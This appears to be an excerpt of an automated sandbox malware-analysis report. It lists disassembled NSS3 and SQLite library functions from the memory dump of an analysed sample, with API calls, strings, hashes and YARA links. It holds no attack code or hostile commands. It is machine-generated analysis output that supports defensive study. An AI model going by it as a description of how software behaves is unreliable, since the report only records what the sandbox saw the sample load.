                                                                                                                                                                                                                          • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                          • API String ID: 703928654-3678606288
                                                                                                                                                                                                                          • Opcode ID: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
                                                                                                                                                                                                                          • Instruction ID: 0ab4c33ba4f61d1b18f0ea017116dea77a61f14442b42f3a18eb332985034b73
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F12271A087809FDB15CF39C850F6BB7F6AF86348F148A1DE48597B55E730D8868B42
                                                                                                                                                                                                                          Function 6C46EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46EF63
                                                                                                                                                                                                                            • Part of subcall function 6C4787D0: PORT_NewArena_Util.NSS3(00000800,6C46EF74,00000000), ref: 6C4787E8
                                                                                                                                                                                                                            • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C46EF74,00000000), ref: 6C4787FD
                                                                                                                                                                                                                            • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47884C
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C46F2D4
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46F2FC
                                                                                                                                                                                                                          • SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C46F30F
                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C46F374
                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(6C5B2FD4,?), ref: 6C46F457
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C46F4D2
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C46F66E
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C46F67D
                                                                                                                                                                                                                          • CERT_DestroyName.NSS3(?), ref: 6C46F68B
                                                                                                                                                                                                                            • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C478338
                                                                                                                                                                                                                            • Part of subcall function 6C478320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C478364
                                                                                                                                                                                                                            • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C47838E
                                                                                                                                                                                                                            • Part of subcall function 6C478320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4783A5
                                                                                                                                                                                                                            • Part of subcall function 6C478320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4783E3
                                                                                                                                                                                                                            • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C4784D9
                                                                                                                                                                                                                            • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C478528
                                                                                                                                                                                                                            • Part of subcall function 6C478900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C478955
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
                                                                                                                                                                                                                          • String ID: "$*$oid.
                                                                                                                                                                                                                          • API String ID: 4161946812-2398207183
                                                                                                                                                                                                                          • Opcode ID: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                          • Instruction ID: f286c6349870113f842c2b74314245c34adc8407fc8e868226c4de6770728951
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E225B7160E3404BF710CE1AC890F6AB7E6AB85359F18462EE4D587F99E7319C06CB83
                                                                                                                                                                                                                          Function 6C411C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C411D58
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C411EFD
                                                                                                                                                                                                                          • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C411FB7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • another row available, xrefs: 6C412287
                                                                                                                                                                                                                          • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C411F83
                                                                                                                                                                                                                          • sqlite_master, xrefs: 6C411C61
                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 6C4120CA
                                                                                                                                                                                                                          • no more rows available, xrefs: 6C412264
                                                                                                                                                                                                                          • table, xrefs: 6C411C8B
                                                                                                                                                                                                                          • sqlite_temp_master, xrefs: 6C411C5C
                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 6C412223
                                                                                                                                                                                                                          • unsupported file format, xrefs: 6C412188
                                                                                                                                                                                                                          • unknown error, xrefs: 6C412291
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                          • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                          • API String ID: 563213449-2102270813
                                                                                                                                                                                                                          • Opcode ID: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                          • Instruction ID: 85cefe7e81ad521ceca978931e28bc61dff3568743bf4eb5df4e8c4cadc03005
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC12AD7060C3418FD714CF19C484E6ABBF2AF86318F188A5DD9D99BB51DB31E846CB82
                                                                                                                                                                                                                          Function 6C435F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
                                                                                                                                                                                                                          • API String ID: 0-3593521594
                                                                                                                                                                                                                          • Opcode ID: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                          • Instruction ID: 70c3f2332e3683cd7be1ccafb7a99889834b05c428aea7eb262ce0210fa7ec44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44438074A08361CFD304CF16C590E5ABBE2BFC9318F14966DE8998B752D731E846CB92
                                                                                                                                                                                                                          Function 6C4DEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0AE
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0C8
                                                                                                                                                                                                                          • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C4DF101
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF11D
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C5A218C), ref: 6C4DF183
                                                                                                                                                                                                                          • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C4DF19A
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF1CB
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF1EF
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C4DF210
                                                                                                                                                                                                                            • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C4852F5
                                                                                                                                                                                                                            • Part of subcall function 6C4852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C48530F
                                                                                                                                                                                                                            • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C485326
                                                                                                                                                                                                                            • Part of subcall function 6C4852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C485340
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF227
                                                                                                                                                                                                                            • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C4DF23E
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DF2BB
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4DF3A8
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF3B3
                                                                                                                                                                                                                            • Part of subcall function 6C482D20: PK11_DestroyObject.NSS3(?,?), ref: 6C482D3C
                                                                                                                                                                                                                            • Part of subcall function 6C482D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C482D5F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1559028977-0
                                                                                                                                                                                                                          • Opcode ID: d74b1dd5c37b331efd40521c015da10455c74cc034ef94a72a0b770dfe9ff31f
                                                                                                                                                                                                                          • Instruction ID: 8f25ea4c68656c7e179c69d29f09bd35bbd183f074dc28751d8b9e9ba0bbb8b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d74b1dd5c37b331efd40521c015da10455c74cc034ef94a72a0b770dfe9ff31f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BD191B6E026059FEB24DF99D890E9EB7F5EF48308F168029D915A7711E731F806CB90
                                                                                                                                                                                                                          Function 6C50DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE33
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                            • Part of subcall function 6C50D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C50DE74,6C4E7FFA,00000002,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002), ref: 6C50D008
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE57
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00000088), ref: 6C50DEA5
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E069
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E121
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C50E14F
                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C50E195
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C50E1FC
                                                                                                                                                                                                                            • Part of subcall function 6C502460: PR_SetError.NSS3(FFFFE005,00000000,6C5A7379,00000002,?), ref: 6C502493
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
                                                                                                                                                                                                                          • String ID: application data$early application data$handshake data$key
                                                                                                                                                                                                                          • API String ID: 1461918828-2699248424
                                                                                                                                                                                                                          • Opcode ID: ef28750de841bf79874c229e47a6781a16d50e7ecf727d4a54f433801830d25a
                                                                                                                                                                                                                          • Instruction ID: 1544dbbd152ab4be32c6b6c89bdd2f3cae6f931d34fa216a2c69275ba2e951b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef28750de841bf79874c229e47a6781a16d50e7ecf727d4a54f433801830d25a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C104B1B002159BEB14CF65CC80BAAB7B4FF49318F144129E909DBA51E771E954CBE1
                                                                                                                                                                                                                          Function 6C4B3850 Relevance: 21.2, APIs: 14, Instructions: 233COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B389F
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B38B3
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B38F1
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B390F
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B3923
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B3972
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B3996
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B39AE
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B39DB
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B3A16
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B3A36
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3A4E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B3A77
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3A8F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$calloc$ErrorLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1642523270-0
                                                                                                                                                                                                                          • Opcode ID: ae638e4bd765c7080aa5d2dfe0f60ba117384bbd9a2fd518311ac84bac2b3f50
                                                                                                                                                                                                                          • Instruction ID: 6118000e7ee5ad5eaf594f9803f90c231e712b742c6026771cc56f7b01300e75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae638e4bd765c7080aa5d2dfe0f60ba117384bbd9a2fd518311ac84bac2b3f50
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC917775D002189FDB00EF69D884FAABBB4BF09318F155169EC15AB711EB30E984CBA5
                                                                                                                                                                                                                          Function 6C3FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FED0A
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEE68
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEF87
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C3FEF98
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C3FF48D
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FF483
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C3FF492
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 4101233201-598938438
                                                                                                                                                                                                                          • Opcode ID: 285ccd160ee4a9d34fa76abc9c69d73c58e9f9596c1e55a52dd1d4e0f6b08f88
                                                                                                                                                                                                                          • Instruction ID: 4cad550ff367a7828ddf79b4d511e18fe4c2b9c9049de29dd9b5e2141a5aaa24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 285ccd160ee4a9d34fa76abc9c69d73c58e9f9596c1e55a52dd1d4e0f6b08f88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0362F334A043458FDB04CF64C880B9ABBF1BF49318F184999D8655BB92D776E887CFA1
                                                                                                                                                                                                                          Function 6C497D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
